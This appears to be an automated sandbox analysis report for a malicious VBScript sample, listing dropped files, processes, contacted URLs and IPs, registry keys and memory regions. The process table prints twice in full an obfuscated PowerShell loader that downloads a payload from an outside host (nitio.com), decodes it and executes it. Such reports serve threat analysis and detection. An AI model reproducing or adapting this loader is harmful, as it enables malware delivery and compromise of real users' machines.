Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
PONO6188.vbs
|
ASCII text, with very long lines (579), with CRLF line terminators
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
modified
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nzlr1h4g.gum.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qkicgyj2.3bb.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_t3uldc5j.i4e.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xymkkhbi.5cf.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Veredict.mou
|
ASCII text, with very long lines (65536), with no line terminators
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PONO6188.vbs"
|
|
|
|
C:\Windows\System32\PING.EXE
|
ping google.com -n 1
|
|
|
|
C:\Windows\System32\PING.EXE
|
ping %.%.%.%
|
|
|
|
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c dir
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Dragonwort = 1;$Vad='Substrin';$Vad+='g';Function Forfatterskaberne($Honnren){$Naeppe=$Honnren.Length-$Dragonwort;For($Tyndhudet=5;
$Tyndhudet -lt $Naeppe; $Tyndhudet+=(6)){$Anticipants+=$Honnren.$Vad.Invoke($Tyndhudet, $Dragonwort);}$Anticipants;}function
Flelsessagers167($baitfish){. ($Statsls) ($baitfish);}$Noncritical84=Forfatterskaberne 'Ni.roM D mmoGaasezBrandi N.dklFrokolMercaaSiv.n/Ensw.5Glaci.
Berm0Nring Teate(ArntpWKnickiDkninnPlessdDeducoRepetwmahonsC vil KilowNP omoT,adly Sejse1Forlg0Klond.Menya0Paata;Cosse SorteW
C.rei,urkin sade6P,tel4Stoni;Bysba Lettex C no6 Folk4Adhak;Fis,i weedrAabenv Voks:Capan1Res z2Nonpo1 Wird.Dront0Hasse) Inte
VauntGStikle.evercVemodkErhveoNeogr/Praef2Forep0A dem1Val,i0 Held0Takt.1Nontr0R,gne1slbsa ParagFJenviiClearrRigore rullfCircuoLid
oxSymme/ Band1Amfib2sho p1Minds.L.est0Tude. ';$Systemgrafs=Forfatterskaberne 'ErnriU D scs KunseA tiqrPolit-tjavsA SpndgtaxieeS.bvenArabet
Dece ';$Bewhite=Forfatterskaberne 'EndanhWadmat Illat annap Gyre:Delig/ Unfl/B mbanElbiliRateft in eiDtrenoArkol. .nurcord.noRestamShoeb/
K,erk Supe2Komma/BregoUHandenWaterc ForwoPoindnshrafsPancrc.iffsiBrydne Convn.utsutPulloiJomfroUningu LodgsToolmn.etaleSpilfsVittus
Gunv.Conc.jSamvrp.nddkbEndoc ';$Foelsomhed=Forfatterskaberne 'Extra>Alkoh ';$Statsls=Forfatterskaberne 'Re,nui KandeHust.x.indu
';$Soil='Bureaucratizes';Flelsessagers167 (Forfatterskaberne 'SuperSThroue Bl atEneka-Unde.CSavtaoBibl.n UbiqtRedekeEnkeln
ucert Lime Has,e-forbuPkludra AdvotminimhSpl.t Mu.tiTNvnin:Kan.n\ ommeAIdeoln Pewet.jlleiAbdietNedkuyDorsipBeclio PissuBrystsImmob.MelletAlactxB
nzetOverp Misfo- CincV lupuaUltralTre.muNum.eeUnive Ign,t$ uskuSmelano gleri UndelSume.; Na,u ');Flelsessagers167 (Forfatterskaberne
'MetafiMaskif Sheo Smaa(GerbrtRaneeeAcquisNitritD.mme-DivispstewaaShooptAmt fhButtl BoxinTBioxa: Gr n\futurAEthionKorrotLdervi
LengtStor,y,arvepSyneroSmrreuKiwifsWebbe.Papagtendowxmisfot Citr)Hoved{ RedseDextrxtrachiTrochtDrnle}.ctor;Benda ');$Plumipede107
= Forfatterskaberne ' OmsteSqsamcTone.hLodlioProli Hvnen%snksmaUnexapDumstpRigsmdCo ntaRenipt FrigaHanke% Smil\ B.rdVKa.meeSe
sur Uhe.eBranddHippoiMbirac Bildt.eget.Unprem RegiocoleouTroll S gte&Afkry&Magia F.odeNatioc N.nphPulpioPreco ulli$ Deod
';Flelsessagers167 (Forfatterskaberne 'Coe o$Inchag AsaflTriumoTrettbUngraa urfl Alun:ThaniHTab reskar,arosarrSpaentGeot.gKontrr
Vrt i DyrseStoddfFakul=Dagge( Te,ecJaspimSkat,dBeeth Udst./Pr.srcOverh Dees$ OpspPAf.ikl FireuArsenmVksthinukesp Dexte DebwdAntere,rocn1Fortn0Print7Stila)
.nds ');Flelsessagers167 (Forfatterskaberne ' U kr$ Vagtg TalllMagniodis.ebStockaRet.rlPseud: arisJBarder,eskfeShan nMand,=
lanc$SwowmB St feUnderwBl myhmarduiT.avstCharyeCatar.KontasVildfpNaganl ggesiAle.atIndsn(No eq$PrebeFUmiacoDyk,eekonfolBlacksNordvoKolormDiscohScolee
Linnd Fabr)Semig ');$Bewhite=$Jren[0];Flelsessagers167 (Forfatterskaberne 'Lokal$StrmfgUsurplWay,ioForhab mdiraHovedlOverd:Pa,peRTrakkeEr,antSubhes
KampsMatchi CohokMumpikSkibseR.tirrInforhNonfeeBarled Recoe.rescnBe oos Un,e=FunicN SknneAllydwCushb-HaandONomeub ToiljV dneeJokercPorthtAphon
enthrSRadixySuttes,nsubtTerateEuropmL,ndl.AutenN .rubeLamedt,etfi.Lap.aW Fr teSvmmebNedsvC DelilOm leiAcclieMareknInkast,nter
');Flelsessagers167 (Forfatterskaberne 'Bu im$TraveRBarfoe HodotImpacsO,isssTrbesidrikkk .nenkLondieE,terrFr,mbhOptraeStududK
yose Da.anSm rosHete..JobsgHBaggreUnperaReinad Laere SerorDybfrswe,tb[Sprud$CoregSBri,hy,odessKnkketTryl e Cheem Phy,gLok.er
,lluaintegfTradis Alge]Unde,=Epina$UnsepNla ceoSum.onReveicMilierF.uori ommtKalifiVibr c U ifa UdpelChor.8 Eksp4Musel ');$Bakteriologierne=Forfatterskaberne
'IodhyRTrnereschn tBoucls tebastol,mi Retsku.remk PseueDialyrPo,olhLar.seCre.edStorteLim enRu,anssplit.udsmuDwarpooParn,wInsatnTjrehlCruseoOutraaNidi,dByforFHunkniUsy,llDom,meStoma(Forst$GenfoBPirojeOverrwAktivhTrindi
Al.rtBllere Trou,Pupp,$ WeinsKin su QuidbE,cinjUnr.me Ag icCal ptSy thiBoo.hoAv,can efisBla,t)Unaus ';$Bakteriologierne=$Heartgrief[1]+$Bakteriologierne;$subjections=$Heartgrief[0];Flelsessagers167
(Forfatterskaberne ' Unva$Clam,gnormklGataao DekobdrninaInsiplPlect:Stym EAdfrdl VaresIchthaDrnfa= klub( Mil T Ci,ieTabansIndh,tSmuds-BrudnPGangwaStubmtGimpihDystr
Comp$TelessSydgau Tranb,hospjLev.veManufc SqustVasociElecto ravenBregnsD,kke)Arbej ');while (!$Elsa) {Flelsessagers167 (Forfatterskaberne
'Si us$LyssigPulerlKlupuoVexi.bAntheaCyanolR fle:MargeN PhotoBehann .recbPowdeaTud,ksExceriEft,rnMarcigDatak3Trold5Rette=Brevf$ParoctknuserAmat,uConsteT
ivi ') ;Flelsessagers167 $Bakteriologierne;Flelsessagers167 (Forfatterskaberne 'FatniS.yroatMargeao.thorSkoletDegre-stockSHu.knlShamee
PotaeLsepepHo ed A,tst4Ta.ov ');Flelsessagers167 (Forfatterskaberne 'Hyb i$Denigg PerclForsvoRec,obUnodoa Dr mlReobl:malleE,ntihlS.rsosRutefaCarfa=nytes(FuldfTPhotoeEug,esR,kistAnr.t-
DetrP,recoaOdon t GavshCo,ed Egmu $GormasRigs.uTilrabaglosj ArbeeStde.cBiogetKalkuiGilbeoLegemnDi,gosfusio)walis ') ;Flelsessagers167
(Forfatterskaberne ' iffe$ T.nngVkkeul Fibeo NaevbGaincaSy,telfesta:OverbF Pip,oValgfrmontelKultiyThysag StiltKnipleSprosrenga.n
Tr meDelussHde s= Ence$DemisgR caglFarseoPartrbEthe.aBeaanldross:SurveVSp jdieditetTeddceRosvrlPolarlHyperaZuniarOv rci Di.tuPedotmTrumf8Bra.n9
Fert+Homil+Boate%Uter.$Hy erJFall,rBo,gie BrownWood .NonercVergeoParasuSeas nDubiotnedga ') ;$Bewhite=$Jren[$Forlygternes];}Flelsessagers167
(Forfatterskaberne ' Ra.e$Adolfg DruplVid oo jamabOplsfa,wvenl Naug:roofyfS,ercj WidieAn.jalTattidKol.i Hj.mm= Hair UnicoG
Smaae tasstDr.ft-cren.CPartioAreeln WaxwtNona.eSammen.nwratEm,ti Tusch$TamelsS,rikuAtt nbPodsojHeathekommacAccentMisapi OphaoGenglnDruses
irke ');Flelsessagers167 (Forfatterskaberne 'Kardi$BarspgFactol HypooF,skebWim,laAwr slKarlj:UnperI OptrmCosmomdukavaBizartNotearAfsigiLnpotk,aleauoppakl.lufseForurr
ArnaiProrinProstgForbeeBedrerExter Dekon=.nnih Luzul[MotorSC.rsty,ments ProttM,kroe R stmlokal.ScythCBascioRibbenGengivEks,le
.istr PrmitUnrec]Rubbi: pern:Ank.rFSolhar AcicoAndelmS,parBCremea TownsProceeLi,en6Undli4SlagsSPantstFd elrUnhomi.ectan ,enigAer
n(primr$ KejsfByggrjHu oreProcolProjedUtopi)C ffe ');Flelsessagers167 (Forfatterskaberne 'Empye$,onpegGaunclQui,do AcarbKnip,aVoliplSejoi:HomunRConsueR
sprcCam hoAu.itnResurtIdkoreStranmFerripAdrielunfraaLabeltUnd,riForgroForbrnMonop Flo,e= prea Subpe[CancrS UkrnyTithasHexamt
iodee ForpmVselm.PinewTPondeeStagnxBreittFi,mo.KoppeEBromfnVve,ecExpenoBr,stdHushoiRapson Progg Regi]Supe.: Kolo:SeverAOilmoSMisi
CV.locIs,iseIKn ge.PusseGPupate efeat SeklSSystet,peakrClituiIndren Ins.gPercu( Fors$SelvmI.entrm,arvemPolaraM.ndst,forgr
Ajugi CacokKatodu Narrl RowleImperrUrpreiStagin Mod gBarnae yriarVrdig)Pimpl ');Flelsessagers167 (Forfatterskaberne 'Empir$Id,lsgMiljalBes.loVed.abPedi.a
PaaflFrimu:AlecttGldspoUpstrnPrl,daZoogerNon,ut .ffie DistrStu,in ReareKmmen=,allo$NringRLaidle U.frc B fro oelnHypnotOmkrae
R.hamKybelpCr.stlBlawnarepubtLingui ovioS,ijonF.yve. IdrisStemnuMora,bPallasfaithtWeekerPree,iSansenDilatg Form( Grns3Klink0Tyrek1.rveg7.rede8
Emul5.atto,ins e2Slupp8.avvr7 mbit4 K.nt7 cypr)Ov,rs ');Flelsessagers167 $tonarterne;"
|
|
|
|
C:\Windows\System32\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Veredict.mou && echo $"
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Dragonwort = 1;$Vad='Substrin';$Vad+='g';Function Forfatterskaberne($Honnren){$Naeppe=$Honnren.Length-$Dragonwort;For($Tyndhudet=5;
$Tyndhudet -lt $Naeppe; $Tyndhudet+=(6)){$Anticipants+=$Honnren.$Vad.Invoke($Tyndhudet, $Dragonwort);}$Anticipants;}function
Flelsessagers167($baitfish){. ($Statsls) ($baitfish);}$Noncritical84=Forfatterskaberne 'Ni.roM D mmoGaasezBrandi N.dklFrokolMercaaSiv.n/Ensw.5Glaci.
Berm0Nring Teate(ArntpWKnickiDkninnPlessdDeducoRepetwmahonsC vil KilowNP omoT,adly Sejse1Forlg0Klond.Menya0Paata;Cosse SorteW
C.rei,urkin sade6P,tel4Stoni;Bysba Lettex C no6 Folk4Adhak;Fis,i weedrAabenv Voks:Capan1Res z2Nonpo1 Wird.Dront0Hasse) Inte
VauntGStikle.evercVemodkErhveoNeogr/Praef2Forep0A dem1Val,i0 Held0Takt.1Nontr0R,gne1slbsa ParagFJenviiClearrRigore rullfCircuoLid
oxSymme/ Band1Amfib2sho p1Minds.L.est0Tude. ';$Systemgrafs=Forfatterskaberne 'ErnriU D scs KunseA tiqrPolit-tjavsA SpndgtaxieeS.bvenArabet
Dece ';$Bewhite=Forfatterskaberne 'EndanhWadmat Illat annap Gyre:Delig/ Unfl/B mbanElbiliRateft in eiDtrenoArkol. .nurcord.noRestamShoeb/
K,erk Supe2Komma/BregoUHandenWaterc ForwoPoindnshrafsPancrc.iffsiBrydne Convn.utsutPulloiJomfroUningu LodgsToolmn.etaleSpilfsVittus
Gunv.Conc.jSamvrp.nddkbEndoc ';$Foelsomhed=Forfatterskaberne 'Extra>Alkoh ';$Statsls=Forfatterskaberne 'Re,nui KandeHust.x.indu
';$Soil='Bureaucratizes';Flelsessagers167 (Forfatterskaberne 'SuperSThroue Bl atEneka-Unde.CSavtaoBibl.n UbiqtRedekeEnkeln
ucert Lime Has,e-forbuPkludra AdvotminimhSpl.t Mu.tiTNvnin:Kan.n\ ommeAIdeoln Pewet.jlleiAbdietNedkuyDorsipBeclio PissuBrystsImmob.MelletAlactxB
nzetOverp Misfo- CincV lupuaUltralTre.muNum.eeUnive Ign,t$ uskuSmelano gleri UndelSume.; Na,u ');Flelsessagers167 (Forfatterskaberne
'MetafiMaskif Sheo Smaa(GerbrtRaneeeAcquisNitritD.mme-DivispstewaaShooptAmt fhButtl BoxinTBioxa: Gr n\futurAEthionKorrotLdervi
LengtStor,y,arvepSyneroSmrreuKiwifsWebbe.Papagtendowxmisfot Citr)Hoved{ RedseDextrxtrachiTrochtDrnle}.ctor;Benda ');$Plumipede107
= Forfatterskaberne ' OmsteSqsamcTone.hLodlioProli Hvnen%snksmaUnexapDumstpRigsmdCo ntaRenipt FrigaHanke% Smil\ B.rdVKa.meeSe
sur Uhe.eBranddHippoiMbirac Bildt.eget.Unprem RegiocoleouTroll S gte&Afkry&Magia F.odeNatioc N.nphPulpioPreco ulli$ Deod
';Flelsessagers167 (Forfatterskaberne 'Coe o$Inchag AsaflTriumoTrettbUngraa urfl Alun:ThaniHTab reskar,arosarrSpaentGeot.gKontrr
Vrt i DyrseStoddfFakul=Dagge( Te,ecJaspimSkat,dBeeth Udst./Pr.srcOverh Dees$ OpspPAf.ikl FireuArsenmVksthinukesp Dexte DebwdAntere,rocn1Fortn0Print7Stila)
.nds ');Flelsessagers167 (Forfatterskaberne ' U kr$ Vagtg TalllMagniodis.ebStockaRet.rlPseud: arisJBarder,eskfeShan nMand,=
lanc$SwowmB St feUnderwBl myhmarduiT.avstCharyeCatar.KontasVildfpNaganl ggesiAle.atIndsn(No eq$PrebeFUmiacoDyk,eekonfolBlacksNordvoKolormDiscohScolee
Linnd Fabr)Semig ');$Bewhite=$Jren[0];Flelsessagers167 (Forfatterskaberne 'Lokal$StrmfgUsurplWay,ioForhab mdiraHovedlOverd:Pa,peRTrakkeEr,antSubhes
KampsMatchi CohokMumpikSkibseR.tirrInforhNonfeeBarled Recoe.rescnBe oos Un,e=FunicN SknneAllydwCushb-HaandONomeub ToiljV dneeJokercPorthtAphon
enthrSRadixySuttes,nsubtTerateEuropmL,ndl.AutenN .rubeLamedt,etfi.Lap.aW Fr teSvmmebNedsvC DelilOm leiAcclieMareknInkast,nter
');Flelsessagers167 (Forfatterskaberne 'Bu im$TraveRBarfoe HodotImpacsO,isssTrbesidrikkk .nenkLondieE,terrFr,mbhOptraeStududK
yose Da.anSm rosHete..JobsgHBaggreUnperaReinad Laere SerorDybfrswe,tb[Sprud$CoregSBri,hy,odessKnkketTryl e Cheem Phy,gLok.er
,lluaintegfTradis Alge]Unde,=Epina$UnsepNla ceoSum.onReveicMilierF.uori ommtKalifiVibr c U ifa UdpelChor.8 Eksp4Musel ');$Bakteriologierne=Forfatterskaberne
'IodhyRTrnereschn tBoucls tebastol,mi Retsku.remk PseueDialyrPo,olhLar.seCre.edStorteLim enRu,anssplit.udsmuDwarpooParn,wInsatnTjrehlCruseoOutraaNidi,dByforFHunkniUsy,llDom,meStoma(Forst$GenfoBPirojeOverrwAktivhTrindi
Al.rtBllere Trou,Pupp,$ WeinsKin su QuidbE,cinjUnr.me Ag icCal ptSy thiBoo.hoAv,can efisBla,t)Unaus ';$Bakteriologierne=$Heartgrief[1]+$Bakteriologierne;$subjections=$Heartgrief[0];Flelsessagers167
(Forfatterskaberne ' Unva$Clam,gnormklGataao DekobdrninaInsiplPlect:Stym EAdfrdl VaresIchthaDrnfa= klub( Mil T Ci,ieTabansIndh,tSmuds-BrudnPGangwaStubmtGimpihDystr
Comp$TelessSydgau Tranb,hospjLev.veManufc SqustVasociElecto ravenBregnsD,kke)Arbej ');while (!$Elsa) {Flelsessagers167 (Forfatterskaberne
'Si us$LyssigPulerlKlupuoVexi.bAntheaCyanolR fle:MargeN PhotoBehann .recbPowdeaTud,ksExceriEft,rnMarcigDatak3Trold5Rette=Brevf$ParoctknuserAmat,uConsteT
ivi ') ;Flelsessagers167 $Bakteriologierne;Flelsessagers167 (Forfatterskaberne 'FatniS.yroatMargeao.thorSkoletDegre-stockSHu.knlShamee
PotaeLsepepHo ed A,tst4Ta.ov ');Flelsessagers167 (Forfatterskaberne 'Hyb i$Denigg PerclForsvoRec,obUnodoa Dr mlReobl:malleE,ntihlS.rsosRutefaCarfa=nytes(FuldfTPhotoeEug,esR,kistAnr.t-
DetrP,recoaOdon t GavshCo,ed Egmu $GormasRigs.uTilrabaglosj ArbeeStde.cBiogetKalkuiGilbeoLegemnDi,gosfusio)walis ') ;Flelsessagers167
(Forfatterskaberne ' iffe$ T.nngVkkeul Fibeo NaevbGaincaSy,telfesta:OverbF Pip,oValgfrmontelKultiyThysag StiltKnipleSprosrenga.n
Tr meDelussHde s= Ence$DemisgR caglFarseoPartrbEthe.aBeaanldross:SurveVSp jdieditetTeddceRosvrlPolarlHyperaZuniarOv rci Di.tuPedotmTrumf8Bra.n9
Fert+Homil+Boate%Uter.$Hy erJFall,rBo,gie BrownWood .NonercVergeoParasuSeas nDubiotnedga ') ;$Bewhite=$Jren[$Forlygternes];}Flelsessagers167
(Forfatterskaberne ' Ra.e$Adolfg DruplVid oo jamabOplsfa,wvenl Naug:roofyfS,ercj WidieAn.jalTattidKol.i Hj.mm= Hair UnicoG
Smaae tasstDr.ft-cren.CPartioAreeln WaxwtNona.eSammen.nwratEm,ti Tusch$TamelsS,rikuAtt nbPodsojHeathekommacAccentMisapi OphaoGenglnDruses
irke ');Flelsessagers167 (Forfatterskaberne 'Kardi$BarspgFactol HypooF,skebWim,laAwr slKarlj:UnperI OptrmCosmomdukavaBizartNotearAfsigiLnpotk,aleauoppakl.lufseForurr
ArnaiProrinProstgForbeeBedrerExter Dekon=.nnih Luzul[MotorSC.rsty,ments ProttM,kroe R stmlokal.ScythCBascioRibbenGengivEks,le
.istr PrmitUnrec]Rubbi: pern:Ank.rFSolhar AcicoAndelmS,parBCremea TownsProceeLi,en6Undli4SlagsSPantstFd elrUnhomi.ectan ,enigAer
n(primr$ KejsfByggrjHu oreProcolProjedUtopi)C ffe ');Flelsessagers167 (Forfatterskaberne 'Empye$,onpegGaunclQui,do AcarbKnip,aVoliplSejoi:HomunRConsueR
sprcCam hoAu.itnResurtIdkoreStranmFerripAdrielunfraaLabeltUnd,riForgroForbrnMonop Flo,e= prea Subpe[CancrS UkrnyTithasHexamt
iodee ForpmVselm.PinewTPondeeStagnxBreittFi,mo.KoppeEBromfnVve,ecExpenoBr,stdHushoiRapson Progg Regi]Supe.: Kolo:SeverAOilmoSMisi
CV.locIs,iseIKn ge.PusseGPupate efeat SeklSSystet,peakrClituiIndren Ins.gPercu( Fors$SelvmI.entrm,arvemPolaraM.ndst,forgr
Ajugi CacokKatodu Narrl RowleImperrUrpreiStagin Mod gBarnae yriarVrdig)Pimpl ');Flelsessagers167 (Forfatterskaberne 'Empir$Id,lsgMiljalBes.loVed.abPedi.a
PaaflFrimu:AlecttGldspoUpstrnPrl,daZoogerNon,ut .ffie DistrStu,in ReareKmmen=,allo$NringRLaidle U.frc B fro oelnHypnotOmkrae
R.hamKybelpCr.stlBlawnarepubtLingui ovioS,ijonF.yve. IdrisStemnuMora,bPallasfaithtWeekerPree,iSansenDilatg Form( Grns3Klink0Tyrek1.rveg7.rede8
Emul5.atto,ins e2Slupp8.avvr7 mbit4 K.nt7 cypr)Ov,rs ');Flelsessagers167 $tonarterne;"
|
|
|
|
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Veredict.mou && echo $"
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
There are 3 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
|
|
|
https://api.ipify.org/
|
104.26.13.205
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://nitio.com/k2/Unconscientiousness.jpbP
|
unknown
|
||
|
http://nitio.com/k2/Unconscientiousness.jpbXR
|
unknown
|
||
|
https://aka.ms/pscore6lB
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
http://nitio.com
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
http://nitio.com/k1/fdoImu226.bin
|
192.185.13.24
|
||
|
http://ftp.concaribe.com
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
http://concaribe.com
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
http://nitio.com/k2/Unconscientiousness.jpb
|
192.185.13.24
|
||
|
https://github.com/Pester/Pester
|
unknown
|
There are 10 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
ftp.concaribe.com
|
unknown
|
|
|
|
google.com
|
172.217.165.206
|
||
|
nitio.com
|
192.185.13.24
|
||
|
api.ipify.org
|
104.26.13.205
|
||
|
concaribe.com
|
192.185.13.234
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
172.217.165.206
|
google.com
|
United States
|
||
|
192.185.13.24
|
nitio.com
|
United States
|
||
|
104.26.13.205
|
api.ipify.org
|
United States
|
||
|
192.185.13.234
|
concaribe.com
|
United States
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS
|
FileDirectory
|
There are 19 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
2418C000
|
trusted library allocation
|
page read and write
|
|
|
|
24161000
|
trusted library allocation
|
page read and write
|
|
|
|
ACF2000
|
direct allocation
|
page execute and read and write
|
|
|
|
5931000
|
trusted library allocation
|
page read and write
|
|
|
|
85C0000
|
direct allocation
|
page execute and read and write
|
|
|
|
21410070000
|
trusted library allocation
|
page read and write
|
|
|
|
22DF0EB1000
|
heap
|
page read and write
|
||
|
22DF0A6F000
|
heap
|
page read and write
|
||
|
87A0000
|
direct allocation
|
page read and write
|
||
|
22DF0AFF000
|
heap
|
page read and write
|
||
|
6B95000
|
heap
|
page execute and read and write
|
||
|
21400001000
|
trusted library allocation
|
page read and write
|
||
|
23FB8000
|
trusted library allocation
|
page read and write
|
||
|
21468423000
|
heap
|
page read and write
|
||
|
80C0000
|
trusted library allocation
|
page read and write
|
||
|
267F1000
|
trusted library allocation
|
page read and write
|
||
|
8478000
|
heap
|
page read and write
|
||
|
2141000F000
|
trusted library allocation
|
page read and write
|
||
|
2146A5C4000
|
heap
|
page read and write
|
||
|
7FFD34090000
|
trusted library allocation
|
page read and write
|
||
|
23C70000
|
heap
|
page read and write
|
||
|
4341F7E000
|
stack
|
page read and write
|
||
|
7FFD340D0000
|
trusted library allocation
|
page read and write
|
||
|
2D75000
|
trusted library allocation
|
page execute and read and write
|
||
|
E8F1AFD000
|
stack
|
page read and write
|
||
|
270C0000
|
trusted library allocation
|
page execute and read and write
|
||
|
267F0000
|
trusted library allocation
|
page read and write
|
||
|
24146000
|
trusted library allocation
|
page read and write
|
||
|
26333000
|
heap
|
page read and write
|
||
|
2BF4000
|
trusted library allocation
|
page read and write
|
||
|
21469E70000
|
heap
|
page read and write
|
||
|
27070000
|
trusted library allocation
|
page read and write
|
||
|
7FFD33F06000
|
trusted library allocation
|
page read and write
|
||
|
22DF0ABE000
|
heap
|
page read and write
|
||
|
267F0000
|
trusted library allocation
|
page read and write
|
||
|
7360000
|
trusted library allocation
|
page execute and read and write
|
||
|
267F0000
|
trusted library allocation
|
page read and write
|
||
|
21400A6C000
|
trusted library allocation
|
page read and write
|
||
|
2AA0000
|
heap
|
page read and write
|
||
|
23F50000
|
trusted library allocation
|
page read and write
|
||
|
22DF0A79000
|
